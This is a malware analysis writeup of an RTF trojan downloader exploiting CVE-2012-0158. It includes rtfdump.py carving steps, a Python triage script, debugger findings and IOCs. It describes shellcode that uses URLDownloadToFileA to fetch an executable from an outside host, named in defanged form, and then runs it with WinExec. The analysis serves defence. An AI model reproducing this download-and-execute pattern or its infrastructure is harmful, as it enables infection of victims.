This is my first malware analysis writeup, on Payment.doc, an RTF document with a trojan downloader embedded in it.

File Info

File Info Payment.doc
MD5 064e82d1a926409f264a8152e315a86e
SHA1 a725f29ee627eed17ef56dca8442704e70d5adf5
SHA256 81083c18e310a1af8ae08c3e5c9eb0e1beea3cb04b2225e5f559ee4ff37e545c
File Type Rich Text Format
File Size 1.15MB
VirusTotal Link

Summary of analysis

The RTF is actually built on CVE-2012-0158, a buffer overflow vulnerability in the ListView/TreeView ActiveX control. The exploit targets MS Office versions 2003, 2007 and 2010.

In this analysis I will not cover the buffer overflow itself; instead I will extract the embedded OLE object, which contains the dropper (exe).

Identification

The document carries a .doc extension, but the file command shows that the actual format is Rich Text Format (RTF).

Characteristics

Dumping the RTF structure shows a very large number of groups, which suggests obfuscation.

Focus on embedded object

We are looking for the group with the highest count of hex characters inside it. Notice that group 165 starts with \*\objdata; this control word is used to embed an object in an RTF file. Rather than embedding the object directly in group 165, the adversary added one more nesting level inside it. The c= field gives the number of subgroups and the h= field the number of hex characters.

Group 165 has only 1 child nested within it, whereas group 166 has 4661 subgroups, which makes it suspicious!

We can look into the content of group 166 using rtfdump.py with the command:

rtfdump.py payment.doc -s 166 | more

Looking at the content, we notice that the meaningful hex characters are “{0 and ..1”; we will now dump the hex content out to verify our analysis.

Dumping the hex content

We dump out the content using the command below; the -H option tells rtfdump.py to decode and dump the hex content.

rtfdump.py payment.doc -s 166 -H > payment.hex

Opening the hex dump, we find that there is indeed a suspicious URL that downloads nestom22.exe.

We now extract the bytes from 0xBA0 to 0xCE0 into a .bin file. How do we know to pick 0xBA0 to 0xCE0? The bytes at 0xBA0 are 90 90 90 90, a NOP sled placed in front of the shellcode to mark where it starts.

We then convert the extracted .bin content into an exe using shellcode2exe.py.
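As an added example (not code from the original writeup), the following Python mirrors the manual steps above: decode the hex text of the \*\objdata group, locate the NOP sled that marks the start of the shellcode, and pull the download URL and the API names out of the carved region for the IOC list. The sample hex blob and the example.invalid URL are constructed; rtfdump.py and shellcode2exe.py are not required.

```python
import binascii
import re

# Constructed sample of \*\objdata hex text: OLE header bytes, a 4-byte NOP
# sled, then the strings the shellcode in this writeup was seen to use,
# followed by the MZP header of the embedded Delphi executable.
SAMPLE_HEX = (
    "01050000 02000000\n"          # 8 bytes of OLE header (constructed)
    "90909090"                      # NOP sled: start of the shellcode
    + b"URLDownloadToFileA\x00".hex()
    + b"http://example.invalid/nestom22.exe\x00".hex()  # placeholder URL
    + b"WinExec\x00word.scr\x00".hex()
    + b"MZP\x00".hex()
)

NON_HEX_RE = re.compile(r"[^0-9A-Fa-f]")
URL_RE = re.compile(rb"https?://[A-Za-z0-9._\-/]+")
API_NAMES = (b"URLDownloadToFileA", b"WinExec")


def decode_objdata_hex(text: str) -> bytes:
    """Decode RTF hex data, ignoring whitespace/newlines between hex pairs
    (assumes no \\bin control words are present in the group)."""
    clean = NON_HEX_RE.sub("", text)
    if len(clean) % 2:
        clean = clean[:-1]  # drop a dangling nibble rather than fail
    return binascii.unhexlify(clean)


def find_nop_sled(blob: bytes, min_len: int = 4) -> int:
    """Offset of the first run of at least min_len 0x90 bytes, or -1."""
    m = re.search(rb"\x90{%d,}" % min_len, blob)
    return m.start() if m else -1


def defang(url: str) -> str:
    """Render a URL non-clickable for inclusion in an IOC list."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def triage(blob: bytes) -> dict:
    """Carve from the NOP sled onward and report URLs, APIs and MZP offset."""
    start = find_nop_sled(blob)
    if start < 0:
        return {"sled_offset": -1, "urls": [], "apis": [], "mzp_offset": -1}
    shellcode = blob[start:]
    return {
        "sled_offset": start,
        "urls": [defang(u.decode()) for u in URL_RE.findall(shellcode)],
        "apis": [a.decode() for a in API_NAMES if a in shellcode],
        "mzp_offset": shellcode.find(b"MZP"),  # -1 if no embedded exe
    }
```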

Dependencies

After converting the .bin into an exe we obtained the following static properties.

File Info Payment.exe
MD5 D7EBBE76012C62DE6370647BF7A9DFA0
SHA1 F4887FA858B4DDFFD84C6EE1445AAEFDF38EE4E3
SHA256 F9120A485EDA066334F29C1453F7A019BE532C2D51B711DF505F877BD613AA30
File Type Executable
File Size 6.5KB
VirusTotal Link

Shellcode

We use pestudio to confirm that payment.exe is indeed an executable. The first bytes are MZP: MZ marks an executable and the P stands for Pascal, so this is a Delphi executable.

Using the strings command we can see the URL. However, strings cannot show clearly how the sample executes, so we will run the shellcode instead.

Running the shellcode shows exactly what it does: the embedded code calls URLDownloadToFileA(hxxp://rtnlogistics.com/nestom22.exe) and saves the download as word.scr.

The shellcode then calls WinExec(word.scr); the WinExec function lets a running program launch another program.

Behavioral and code analysis findings

Running it in a debugger, we see that at 0040103E the shellcode starts loading MZP, the starting bytes of the executable.

Single-stepping, we find that URLDownloadToFileA is called at 004010CB.

Secondary exe - nestom22.exe

nestom22.exe is no longer available for download. We can nonetheless conclude that the RTF is a downloader that fetches and executes a second executable.

Incident recommendation

We have identified the IOCs from the initial analysis; without the second exe we cannot verify its content, but we do know that the RTF is a trojan dropper.

IOC
URL hxxp://rtnlogistics.com/nestom22.exe
Payment.doc SHA256 81083c18e310a1af8ae08c3e5c9eb0e1beea3cb04b2225e5f559ee4ff37e545c
Payment.exe SHA256 F9120A485EDA066334F29C1453F7A019BE532C2D51B711DF505F877BD613AA30